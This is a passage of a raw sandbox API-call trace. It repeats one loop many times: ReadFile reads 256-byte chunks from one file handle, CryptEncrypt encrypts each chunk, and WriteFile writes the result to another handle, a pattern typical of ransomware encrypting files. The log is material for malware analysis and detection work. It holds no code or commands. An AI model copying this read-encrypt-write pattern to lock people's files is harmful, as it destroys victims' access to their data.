lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.581] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.581] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.581] GetLastError () returned 0x0 [0167.581] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.582] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.582] GetLastError () returned 0x0 [0167.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.582] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.582] GetLastError () returned 0x0 [0167.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.582] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.582] GetLastError () returned 0x0 [0167.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.582] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.582] GetLastError () returned 0x0 [0167.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.582] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.582] GetLastError () returned 0x0 [0167.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.582] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.582] GetLastError () returned 0x0 [0167.582] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.582] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.583] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.583] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.583] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.583] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.584] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.584] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.584] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.584] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.584] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.584] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.584] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.584] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.584] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.584] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.584] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.584] GetLastError () returned 0x0 [0167.584] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.584] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.585] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.585] GetLastError () returned 0x0 [0167.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.585] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.585] GetLastError () returned 0x0 [0167.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.585] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.585] GetLastError () returned 0x0 [0167.585] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.585] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.586] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.586] GetLastError () returned 0x0 [0167.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.586] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.586] GetLastError () returned 0x0 [0167.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.586] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0167.586] GetLastError () returned 0x0 [0167.586] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0167.586] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0167.586] CryptEncrypt (in: hKey=0x9ad678, hHash=0x0, Final=0, 